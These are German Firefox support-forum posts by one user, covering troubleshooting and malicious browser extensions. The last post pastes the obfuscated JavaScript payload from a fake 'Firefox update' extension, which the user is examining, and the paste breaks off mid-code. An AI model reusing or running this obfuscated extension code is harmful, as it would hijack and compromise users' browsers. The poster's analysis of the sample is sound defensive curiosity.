übrigens gerade gefunden, wo das schon mal beschrieben wurde https://support.mozilla.org/de/questions/1212497
Beiträge von Zitronella
-
-
Doch, https://screenshots.firefox.com/Mnyq8vw404xkbx…ons.mozilla.org man muss aber erstmalig diese Seite besuchen und dann noch auf "Klassische Desktop-Website anzeigen" klicken.
-
klar, gerne mache ich.
-
Das hier ist zwar gelöst. Aber ich hefte es trotzdem mal hier ran. Ich fand gerade eine Erweiterung, die verhindert, dass man about:addons aufrufen kann. Sobald man das macht, landet man auf google.com.
Ich frage mich wie das möglich sein kann :o Dachte so etwas wäre mit WebExtensions gar nicht möglich :-??
Somit gibts auch keinen Weg diese Erweiterung wieder zu deinstallieren (ok, gut händisch gehts natürlich oder auch mit Firefox zurücksetzen oder im SafeMode deinstallieren) -
bitte. Ja heute morgen hatte ich das auch gemacht und da gings nicht. Ich denke die Filterlisten wurden halt danach noch einmal aktualisiert.
-
übrigens kann ich jetzt wieder bild.de aufrufen. Hatte vorher in ublock alle Cache Speicher geleert und neu aktualisieren lassen und den Browser dann geschlossen.
-
BlackRitus sein Post ergibt keinen Sinn. Ich schätze er hat ein "nicht" vergessen.
-
Dein Firefox Profil kannst du sichern
https://support.mozilla.org/de/kb/firefox-…iederherstellen -
Zu 3:Das sind wahrscheinlich Cookies, die schon da waren, bevor du die Einstellung "Chronik niemals anlegen" gesetzt hast.
-
also wenn ich dort auf "Ausgabe Lesen" Button klicke und danach oben auf den Pfeil nach unten "Seite als PDF herunter laden" klicke, kann ich das PDF herunter laden. Da ich nicht angemeldet bin, lädt es natürlich das PDF in begrenzter Form, nämlich nur die erste Seite, herunter.
-
Reicht es nicht einfach den TAB mit dem Kreuz rechts zu schließen?
Bei betreffender Seite (mir wurde ja die URL zu so einer Fake Seite zugesandt), ist das Problem, dass immer wieder ein sog. Authentifizierungs Fenster kommt (in dieser Form https://mozhelp.dynvpn.de/dateien/forum/geheim/index.php), und so lange das da ist, kann man den Tab nicht schließen. Drückt man mit der Maus auf Abbrechen, und will danach den Tab schließen fährt man automatisch mit der Maus über die Seite und genau das reicht schon aus, dass sich dieses Fenster immer wieder öffnet (das wird per JS Code ausgelöst). Um das zu umgehen, muss man, anstatt mit der Maus auf Abbrechen zu klicken, die Esc Taste drücken, damit der JS-Code nicht ausgelöst wird und das Authorisierungsfenster nicht wieder öffnet. Danach kann man erst den Tab schließen -
Ja kannst du, indem du zahlst
https://www.downloadhelper.net/convertDieses "Marke" ist übrigens ein QR-Code https://de.wikipedia.org/wiki/QR-Code
-
nö, geht bei mir auch nicht. (mir isses aber völlig egal bei dieser Seite)
-
Vielen Dank für den Link und auch für die Erklärung was die Erweiterung macht.
-
Ich habe mir absichtlich mal eine Erweiterung von so einer Malware Seite geladen. Sie gibt vor ein Firefox Update wäre nötig usw.
Ich lade mir gerne so etwas herunter (ohne zu installieren und wenn dann nur in einer VM) um diese zu entpacken und mir den darin liegenden Code mit Notepad++ anzusehen und vielleicht etwas Aufschluss darüber zu bekommen was die Erweiterung macht.
So wollte ich es auch mit dieser machen.
Die Datei besteht eigentlich nur aus
META-INF (Ordner)
background.js
content.js
manifest.jsonIn der content.js ist nur seltsamer Code zu finden. :shock: und zwar dieser hier:
Code$$=~[];$$={___:++$$,$$$$:(![]+"")[$$],__$:++$$,$_$_:(![]+"")[$$],_$_:++$$,$_$$:({}+"")[$$],$$_$:($$[$$]+"")[$$],_$$:++$$,$$$_:(!""+"")[$$],$__:++$$,$_$:++$$,$$__:({}+"")[$$],$$_:++$$,$$$:++$$,$___:++$$,$__$:++$$};$$.$_=($$.$_=$$+"")[$$.$_$]+($$._$=$$.$_[$$.__$])+($$.$$=($$.$+"")[$$.__$])+((!$$)+"")[$$._$$]+($$.__=$$.$_[$$.$$_])+($$.$=(!""+"")[$$.__$])+($$._=(!""+"")[$$._$_])+$$.$_[$$.$_$]+$$.__+$$._$+$$.$;$$.$$=$$.$+(!""+"")[$$._$$]+$$.__+$$._+$$.$+$$.$$;$$.$=($$.___)[$$.$_][$$.$_];$$.$($$.$($$.$$+"\""+"("+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"()\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$_$$+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+".\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"."+(![]+"")[$$._$_]+$$._$+$$.$$__+$$.$_$_+(![]+"")[$$._$_]+".\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+$$.__+"(\\\"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$_$_+(![]+"")[$$._$_]+(![]+"")[$$._$_]+$$.$$$_+$$.$$_$+"\\\")\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"."+$$.__+"\\"+$$.__$+$$.$_$+$$.___+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+"(\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"(\\"+$$.__$+$$.$_$+$$.__$+$$.__+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$_$+")\\"+$$.$__+$$.___+"=>\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+$$.__$+$$.$$$$+"\\"+$$.$__+$$.___+"(\\"+$$.__$+$$.$_$+$$.__$+$$.__+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$_$+".\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$_$_+(![]+"")[$$._$_]+(![]+"")[$$._$_]+$$.$$$_+$$.$$_$+")\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$.$$_+$$.$_$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.$__+$$.___+"=\\"+$$.$__+$$.___+$$.$$_$+$$._$+$$.$$__+$$._+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"."+$$.$$__+"\\"+$$.__$+$$.$$_+$$._$_+$$.$$$_+$$.$_$_+$$.__+$$.$$$_+"\\"+$$.__$+$$.___+$$.$_$+(![]+"")[$$._$_]+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"('\\"+$$.__$+$$.$$_+$$._$$+$$.$$__+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$$_+$$.___+$$.__+"');\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+".\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.__$+$$.$$_+$$._$_+$$.$$__+"\\"+$$.$__+$$.___+"=\\"+$$.$__+$$.___+"`${"+$$.$_$_+$$.__+$$._$+$$.$_$$+"(\\\"\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$.$$$+$$.__$+$$.$__$+$$.__+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$._$_+$$.$$$+"\\"+$$.__$+$$._$_+$$.$$_+$$.$__+$$.$$_$+"\\"+$$.__$+$$.___+$$.$$$+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$.$_$+$$.$_$+"\\"+$$.__$+$$._$$+$$.__$+$$._$_+$$.$__$+$$._+"\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$.$_$+$$.$_$+"\\"+$$.__$+$$.__$+$$.$$_+"\\"+$$.__$+$$.$$_+$$.$$_+$$.$_$$+"\\"+$$.__$+$$._$_+$$._$$+$$.$___+"\\"+$$.__$+$$.$$$+$$.___+"\\"+$$.__$+$$._$$+$$.__$+"\\"+$$.__$+$$.$$$+$$._$_+$$.$$__+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$._$$+$$.__$+"\\"+$$.__$+$$.$$$+$$._$_+"\\"+$$.__$+$$.__$+$$.__$+$$._$_+"\\"+$$.__$+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+$$.$__+"\\"+$$.__$+$$.__$+$$._$_+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.__$+$$.$$_+"\\"+$$.__$+$$.$_$+$$._$_+"\\"+$$.__$+$$._$_+$$.$_$+$$._$_+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$._$_+$$.$$$+"\\"+$$.__$+$$.__$+$$.__$+"\\"+$$.__$+$$.$$$+$$._$_+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$.___+$$.$$$+"\\"+$$.__$+$$.___+$$.$_$+$$._+$$.$_$_+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.__$+$$.$_$+"=\\\")}`;\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$$_$+$$._$+$$.$$__+$$._+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"."+$$.$_$$+$$._$+$$.$$_$+"\\"+$$.__$+$$.$$$+$$.__$+"."+$$.$_$_+"\\"+$$.__$+$$.$$_+$$.___+"\\"+$$.__$+$$.$$_+$$.___+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+"\\"+$$.__$+$$.___+$$._$$+"\\"+$$.__$+$$.$_$+$$.___+"\\"+$$.__$+$$.$_$+$$.__$+(![]+"")[$$._$_]+$$.$$_$+"(\\"+$$.__$+$$.$$_+$$._$$+");\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"}\\"+$$.$__+$$.___+$$.$$$_+(![]+"")[$$._$_]+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"."+$$.$_$_+$$.$$_$+$$.$$_$+"\\"+$$.__$+$$.___+$$.$_$+"\\"+$$.__$+$$.$$_+$$.$$_+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"(\\\"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"\\\",\\"+$$.$__+$$.___+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.$__+$$.___+"("+$$.$$$_+")\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$_$$+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+".\\"+$$.__$+$$.$$_+$$._$_+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+".\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+"\\"+$$.__$+$$.__$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"({\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$$+$$._$+":\\"+$$.$__+$$.___+$$.$$$_+"."+$$.$$_$+$$.$_$_+$$.__+$$.$_$_+".\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$$+$$._$+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+$$.__+"\\"+$$.__$+$$._$_+$$.$__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+$$._$+$$._+$$.__+"("+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"(){\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"."+(![]+"")[$$._$_]+$$._$+$$.$$__+$$.$_$_+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+".\\"+$$.__$+$$.$_$+$$.___+"\\"+$$.__$+$$.$$_+$$._$_+$$.$$$_+$$.$$$$+"\\"+$$.$__+$$.___+"=\\"+$$.$__+$$.___+"\\\"#"+$$.$$_$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$_+"\\\";\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"},\\"+$$.$__+$$.___+$$.__$+$$.___+$$.___+$$.___+"\\"+$$.$__+$$.___+"*\\"+$$.$__+$$.___+$$.__$+");\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+$$.__+"\\"+$$.__$+$$._$_+$$.$__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+$$._$+$$._+$$.__+"("+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"(){\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$_$$+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+".\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"."+(![]+"")[$$._$_]+$$._$+$$.$$__+$$.$_$_+(![]+"")[$$._$_]+".\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+$$.__+"({\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$_$_+(![]+"")[$$._$_]+(![]+"")[$$._$_]+$$.$$$_+$$.$$_$+":"+$$.__$+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"},\\"+$$.$__+$$.___+$$.$_$+$$.___+$$.___+"\\"+$$.$__+$$.___+"*\\"+$$.$__+$$.___+$$.__$+");\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"}\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"},\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"("+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+")\\"+$$.$__+$$.___+"=>\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$$__+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$._$+(![]+"")[$$._$_]+$$.$$$_+"."+(![]+"")[$$._$_]+$$._$+"\\"+$$.__$+$$.$__+$$.$$$+"('\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$._$_+$$._$$+"::"+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+"',\\"+$$.$__+$$.___+$$.$$$_